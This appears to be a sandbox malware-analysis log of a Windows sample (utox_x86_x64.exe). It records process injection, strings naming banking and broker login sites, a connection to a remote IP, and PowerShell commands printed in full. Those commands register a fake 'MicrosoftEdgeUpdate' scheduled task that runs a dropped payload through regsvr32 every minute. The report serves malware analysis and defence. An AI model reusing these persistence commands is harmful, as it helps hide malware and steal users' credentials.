Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\utox_x86_x64.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\dllhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\dllhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rekeywiz.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rekeywiz.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rekeywiz.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rekeywiz.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rekeywiz.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rekeywiz.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rekeywiz.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\rekeywiz.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Memory allocated: E50000 memory reserve | memory write watch
Source: C:\Windows\System32\regsvr32.exe Memory allocated: 1B120000 memory reserve | memory write watch
Source: C:\Windows\System32\regsvr32.exe Memory allocated: 910000 memory reserve | memory write watch
Source: C:\Windows\System32\regsvr32.exe Memory allocated: 1A340000 memory reserve | memory write watch
Source: C:\Windows\System32\dllhost.exe Code function: GetAdaptersInfo, 15_2_000002913DF12AC4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4880
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4961
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6429
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3194
Source: C:\Users\user\Desktop\utox_x86_x64.exe Window / User API: threadDelayed 376
Source: C:\Users\user\Desktop\utox_x86_x64.exe Window / User API: threadDelayed 3434
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6959
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2672
Source: C:\Windows\System32\regsvr32.exe Window / User API: threadDelayed 3130
Source: C:\Windows\System32\regsvr32.exe Window / User API: threadDelayed 6728
Source: C:\Windows\System32\rekeywiz.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\oSyU.ini
Source: C:\Users\Public\ajbs50ul.bat Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\4smg.ini
Source: C:\Windows\System32\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\Public\ajbs50ul.bat API coverage: 1.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6752 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2340 Thread sleep count: 6429 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2340 Thread sleep count: 3194 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1912 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 5468 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\utox_x86_x64.exe TID: 1732 Thread sleep time: -63600s >= -30000s
Source: C:\Users\user\Desktop\utox_x86_x64.exe TID: 1732 Thread sleep time: -686800s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8 Thread sleep count: 6959 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8 Thread sleep count: 2672 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2000 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 6432 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 6764 Thread sleep count: 3130 > 30
Source: C:\Windows\System32\regsvr32.exe TID: 6764 Thread sleep count: 6728 > 30
Source: C:\Windows\System32\regsvr32.exe TID: 3700 Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Windows\System32\OpenWith.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9440F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,FindClose,GetLastError, 3_2_00007FF79E9440F0
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6C22D0 GetSystemInfo,VirtualAlloc, 14_2_00000203FE6C22D0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\regsvr32.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: OpenWith.exe, 0000000B.00000003.1627826487.000001BD88044000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkmbolicLinkSymbolicLink
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: OpenWith.exe, 0000000B.00000003.1627826487.000001BD88044000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkLinkcLinkSymbolicLink
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: OpenWith.exe, 0000000B.00000003.1594021561.000001BD8757A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkcLinkSymbolicLinkA
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: powershell.exe, 00000001.00000002.1553292127.0000018C26262000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: utox_x86_x64.exe, 00000008.00000002.2596384232.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: OpenWith.exe, 0000000B.00000003.1511290183.000001BD87830000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DisableGuestVmNetworkConnectivity
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: OpenWith.exe, 0000000B.00000003.1635909346.000001BD88049000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Prod_VMware_SATA_CD00#4&224f42ef&0&0
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: OpenWith.exe, 0000000B.00000003.1511290183.000001BD87830000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: EnableGuestVmNetworkConnectivity
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: OpenWith.exe, 0000000B.00000003.1628114861.000001BD877C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E942CF0 GetProcessHeap,HeapAlloc, 3_2_00007FF79E942CF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E8F1180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm, 3_2_00007FF79E8F1180
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79EACBC00 SetUnhandledExceptionFilter, 3_2_00007FF79EACBC00
Source: C:\Users\Public\ajbs50ul.bat Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\regsvr32.exe Network Connect: 185.196.9.174 7777
Source: Yara match File source: amsi64_5884.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5884, type: MEMORYSTR
Source: 7.2.regsvr32.exe.2f20000.1.raw.unpack, Flutter.cs Reference to suspicious API methods: VirtualAlloc(IntPtr.Zero, new IntPtr(65536), MEM_COMMIT, 4u)
Source: 7.2.regsvr32.exe.2f20000.1.raw.unpack, Flutter.cs Reference to suspicious API methods: Marshal.WriteIntPtr(new IntPtr(intPtr.ToInt64() + num), GetProcAddress(moduleHandle, array[i]))
Source: 7.2.regsvr32.exe.2f20000.1.raw.unpack, Flutter.cs Reference to suspicious API methods: VirtualProtect(intPtr, 65536u, 64u, out var _)
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Memory allocated: C:\Windows\System32\dllhost.exe base: 2913DF10000 protect: page read and write
Source: C:\Users\Public\ajbs50ul.bat NtWriteFile: Indirect: 0x7FF79E947076
Source: C:\Windows\System32\regsvr32.exe Thread register set: 1316 5
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Memory written: C:\Windows\System32\dllhost.exe base: 2913DF10000
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Memory written: C:\Windows\System32\dllhost.exe base: 7FF7D87314E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\ajbs50ul.bat "C:\Users\Public\ajbs50ul.bat"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\Desktop\utox_x86_x64.exe "C:\Users\user\Desktop\utox_x86_x64.exe"
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C804C8C0-8CC0-4804-C048-00888CC0048C}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Program Files\Windows Media Player\wmpnscfg.exe "C:\Program Files\Windows Media Player\wmpnscfg.exe"
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe"
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{848CC004-CC00-4888-C000-44488CCC0488}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/4smg.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{c804c8c0-8cc0-4804-c048-00888cc0048c}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/osyu.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{848cc004-cc00-4888-c000-44488ccc0488}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)"
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/4smg.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{c804c8c0-8cc0-4804-c048-00888cc0048c}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/osyu.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{848cc004-cc00-4888-c000-44488ccc0488}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)"
Source: C:\Windows\System32\OpenWith.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
